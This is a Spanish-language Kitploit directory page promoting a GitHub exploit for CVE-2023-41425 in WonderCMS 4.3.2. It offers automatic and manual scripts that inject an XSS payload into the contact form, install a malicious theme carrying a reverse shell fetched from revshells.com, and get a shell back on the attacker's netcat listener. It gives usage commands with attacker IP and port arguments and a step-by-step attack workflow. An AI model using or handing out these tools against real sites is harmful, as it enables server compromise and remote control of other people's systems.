Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425 — CVE-2023-41425 Reacondicionar | Kitploit
Herramientas/GitHubGitHub/
0xdtc
/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425
Generación de PayloadsExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHub0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425

WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425

CVE-2023-41425 Reacondicionar

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

WonderCMS 4.3.2 Exploits XSS a RCE

Resumen

Estos scripts explotan una vulnerabilidad XSS (Cross-Site Scripting) en WonderCMS 4.3.2 para lograr Ejecución Remota de Código (RCE). El payload XSS, cuando es activado por el administrador, instala automáticamente una reverse shell en el servidor objetivo aprovechando un módulo de tema malicioso diseñado. La reverse shell se obtiene de revshells.com y se ejecuta, otorgando al atacante acceso remoto al servidor.


Tabla de Contenidos

  • Requisitos previos
  • Script 1: Exploit Automático
    • Características
    • Uso
  • Script 2: Exploit Manual
    • Características
    • Uso
  • Notas
  • Licencia

Requisitos previos

Para ejecutar con éxito cualquiera de los scripts, se requieren las siguientes herramientas y condiciones:

  1. Bash Shell: Ambos scripts están escritos para entornos Linux usando el shell Bash.
  2. netcat (nc): Se utiliza para escuchar la conexión de reverse shell.
  3. Python3: Se utiliza un servidor HTTP simple de Python para alojar el payload XSS.
  4. WonderCMS 4.3.2: El objetivo debe estar ejecutando una versión vulnerable de WonderCMS.
  5. Interacción del administrador: El payload requiere que un administrador active el XSS, lo que resulta en la ejecución de la reverse shell.
  6. revshells.com: El payload de reverse shell se descarga dinámicamente de revshells.com.

Script 1: Exploit Automático

POC

Pasted image 20241010021603

Características

Esta versión del exploit verifica automáticamente si hay un listener nc activo, descarga la reverse shell, inicia el servidor HTTP, envía el payload y espera a que el administrador active la reverse shell.

  • Configuración automática de reverse shell: Descarga una reverse shell pregenerada de revshells.com.
  • Inyección de payload XSS: Inyecta un payload XSS en el formulario de contacto del objetivo.
  • Gestión del servidor HTTP: Inicia automáticamente un servidor HTTP Python para alojar el payload de reverse shell.
  • Verificación del listener nc: Asegura que el listener esté funcionando antes de continuar.
  • Envío automático del payload: Envía el payload automáticamente sin interacción del usuario.

Uso

  1. Asegúrate de que el listener nc esté ejecutándose en el puerto especificado:
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. Ejecuta el script con el siguiente comando:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Ejemplo:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Flujo de trabajo

  1. Descargar reverse shell: El script descarga la reverse shell desde revshells.com.
  2. Modificar la reverse shell: El script de reverse shell se actualiza con la IP y puerto del atacante.
  3. Crear payload ZIP: Se crea un archivo ZIP que contiene la reverse shell.
  4. Elaborar payload XSS: Se genera un payload XSS que instala la reverse shell y se inyecta en el formulario de contacto vulnerable.
  5. Iniciar servidor HTTP automáticamente: El script inicia un servidor HTTP Python para servir el payload malicioso.
  6. Enviar payload automáticamente: El payload XSS se envía al administrador automáticamente.

Script 2: Exploit Manual

POC

Pasted image 20241010013048

Usa el exploit proporcionado por el script en el campo Website...

Pasted image 20241010013218

Características

Esta versión requiere que el usuario administre manualmente el listener nc y la activación del payload XSS. Es más adecuada para escenarios donde los procesos automáticos no son deseables.

  • Configuración manual de reverse shell: El usuario es responsable de asegurar que el listener esté funcionando.
  • Activación manual de XSS: El script proporciona el enlace malicioso para enviar al administrador, pero el payload debe activarse manualmente.
  • Gestión del servidor HTTP: Inicia un servidor HTTP Python para alojar el payload XSS.

Uso

  1. Asegúrate de que el listener nc esté ejecutándose en el puerto especificado:
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. Ejecuta el script con el siguiente comando:
    root@kitploit:~
    ./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Ejemplo:
    root@kitploit:~
    ./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Flujo de trabajo

  1. Descargar reverse shell: Descarga una reverse shell desde revshells.com.
  2. Modificar la reverse shell: Actualiza la reverse shell con la IP y puerto del atacante.
  3. Crear payload ZIP: Crea un archivo ZIP que contiene la reverse shell.
  4. Elaborar payload XSS: Genera un payload XSS que instala la reverse shell.
  5. Mostrar enlace malicioso: Muestra el enlace que debe enviarse al administrador para su activación.
  6. Iniciar servidor HTTP: Inicia un servidor HTTP Python para alojar el payload.

Notas

  • Interacción del administrador: Ambos exploits dependen de que el administrador de WonderCMS active el payload XSS visitando la página vulnerable. Una vez activado, se establece la reverse shell con la máquina del atacante.
  • Firewall/IDS/IPS: Ten cuidado al ejecutar estos exploits en entornos protegidos por firewalls o Sistemas de Detección de Intrusos (IDS) que podrían bloquear o alertar sobre actividad sospechosa.
  • Divulgación responsable: Si encuentras que un objetivo es vulnerable, sigue siempre las pautas éticas y reporta la vulnerabilidad a las partes correspondientes.

Licencia

Descargar herramienta